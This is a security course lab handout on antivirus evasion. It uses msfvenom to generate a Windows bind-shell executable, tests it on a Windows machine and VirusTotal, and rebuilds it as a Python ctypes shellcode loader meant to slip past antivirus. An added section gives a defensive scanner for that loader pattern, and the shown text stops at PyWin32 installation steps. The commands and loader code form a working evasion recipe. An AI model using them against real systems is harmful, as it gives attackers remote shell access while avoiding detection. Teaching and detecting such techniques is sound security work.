Lab 11

The document discusses generating malicious code using Metasploit and Python to evade antivirus detection. It covers using msfvenom to generate Windows payloads, testing them on a target system and VirusTotal, and modifying the output to be executed from Python instead of directly as an executable.
Proj 8: Antivirus Evasion with Python

Generating Malicious Code with Metasploit

Metasploit can generate a lot of malicious code, but it's well-known to antivirus companies and easily
recognized in its original form.

In Kali Linux, in a Terminal, execute this command:

msfvenom -l payload | more

In Kali Linux, in a Terminal, execute this command:

msfvenom -l payload | grep windows | grep shell


You see many ways to bind a shell on Windows, as shown below.
Binding a shell is the simplest form of remote control, listening on a port and allowing anyone who
connects to that port to execute command lines.

This is obviously a very insecure thing, and any sensible antivirus will stop it.

In Kali Linux, in a Terminal, execute this command:

msfvenom --payload windows/shell_bind_tcp --list-options

A summary of this payload and its options appears, as shown below.


There are two required parameters: EXITFUNC and LPORT, and they are both set to reasonable default
values.

In Kali Linux, in a Terminal, execute these commands:

msfvenom -p windows/shell_bind_tcp -f exe -o shell.exe

ls -l shell.exe

An executable is created, as shown below.

Testing the Malware on a Windows Target (Optional)

Move the "shell.exe" file to a Windows system and run it.


I double-clicked "shell.exe" to run it, and a Windows command line now shows it listening on port 4444
in netstat.

Task Manager shows the running "shell.exe" process.


I can control my Windows machine with netcat from Linux:

Testing the Malware at VirusTotal

In Kali Linux, open Firefox by clicking the blue icon at the top left of the window.

Go to

http://virustotal.com

Click the "Choose File" button.


Browse to your "shell.exe" file and double-click it.

Click the "Scan It!" button.

Your file should be detected as malicious by many of the antivirus engines. When I did it, 58/71 engines
detected it, as shown below.

Creating Malware with Python

In Kali Linux, in a Terminal, execute this command:

msfvenom -p windows/shell_bind_tcp -f c

To compile the code into a Windows executable, it needs to be in a file. That's easy to do.

In Kali Linux, in a Terminal, execute these commands:

msfvenom -p windows/shell_bind_tcp -f python -o shell.py

ls -l shell.py

This code is written in C, not in Python, so some additional lines are needed.

In Kali Linux, in a Terminal, execute this command:

nano shell.py

The code appears in the nano text editor, as shown below.

Add this line to the top of the file:

from ctypes import *

That imports the library code needed to run a C program from Python.

Remove all the comment lines.

Remove this line:

unsigned char buf[] =

Add this text to the start of the first line of hexadecimal codes:

shellcode = (

Your screen should now look like this:


In nano, use the down-arrow key to get to the end of the file.

It should look like this:

Add a closing parenthesis before the semicolon at the end of the last line, like this:

Add these lines to the end of the file:

memorywithshell = create_string_buffer(shellcode, len(shellcode))

shell = cast(memorywithshell, CFUNCTYPE(c_void_p))

shell()

Your screen should now look like this:

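As an added defensive example (not part of the lab), a small static check for the ctypes loader pattern this section builds: a ctypes import, a long hex-escaped byte literal, create_string_buffer, and a cast to CFUNCTYPE that is then called. Both sample inputs are constructed; the "loader" sample uses 0x90 filler bytes, not a real payload.

```python
import re

# Indicators of the in-memory loader pattern assembled in this lab:
# ctypes is imported, a large hex-escaped byte literal is assigned, the
# buffer is copied into a ctypes string buffer, cast to a function pointer
# and called. Each marker alone is common in benign code; the chain is not.
LOADER_MARKERS = {
    "ctypes_import": re.compile(r"^\s*(from\s+ctypes\s+import|import\s+ctypes)", re.M),
    "string_buffer": re.compile(r"create_string_buffer\s*\("),
    "func_cast":     re.compile(r"cast\s*\([^)]*CFUNCTYPE\s*\("),
}
# A run of 32 or more \xNN escapes inside one literal, as msfvenom -f python emits.
HEX_BLOB = re.compile(r"(?:\\x[0-9a-fA-F]{2}){32,}")

def scan_source(text, min_blob_bytes=64):
    """Return matched indicators, total embedded blob size and a verdict."""
    hits = {name: bool(rx.search(text)) for name, rx in LOADER_MARKERS.items()}
    # Each \xNN escape is 4 characters, so length // 4 is the byte count.
    blob_bytes = sum(len(m.group(0)) // 4 for m in HEX_BLOB.finditer(text))
    hits["hex_blob"] = blob_bytes >= min_blob_bytes
    # Require the whole chain to keep false positives on ordinary ctypes use low.
    suspicious = all(hits.values())
    return {"indicators": hits, "blob_bytes": blob_bytes, "suspicious": suspicious}

# Constructed sample shaped like the edited shell.py (filler bytes, not a payload).
SAMPLE_LOADER = (
    "from ctypes import *\n"
    "shellcode = (\n"
    + "".join('"' + "\\x90" * 40 + '"\n' for _ in range(3))
    + ")\n"
    "memorywithshell = create_string_buffer(shellcode, len(shellcode))\n"
    "shell = cast(memorywithshell, CFUNCTYPE(c_void_p))\n"
    "shell()\n"
)
# Constructed benign ctypes use: calls a libc function, no embedded blob.
SAMPLE_BENIGN = (
    "import ctypes\n"
    "libc = ctypes.CDLL(None)\n"
    "print(libc.getpid())\n"
)

if __name__ == "__main__":
    for label, src in (("loader", SAMPLE_LOADER), ("benign", SAMPLE_BENIGN)):
        print(label, scan_source(src))
```

The check is deliberately strict; a loader that splits the bytes differently or wraps ctypes calls in helpers will need additional markers.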

Turning Off Internet Explorer Enhanced Security Configuration

This is an annoyance that only happens on Server versions of Windows. It's intended to deter people
from surfing the Internet on a server.

In the lower right of Server Manager, in the "Security Information" section, click the "Configure IE ESC"
link, as shown below.

Click both Off buttons, as shown below. Then click OK.

Installing PyWin32

On Windows, in a Web browser, go to

http://sourceforge.net/projects/pywin32/files/

On the left side, under the "Name" heading, click pywin32, as shown below.
On the next page, click "Build 218".

On the next page, click "pywin32-218.win32-py2.7.exe", as shown below.
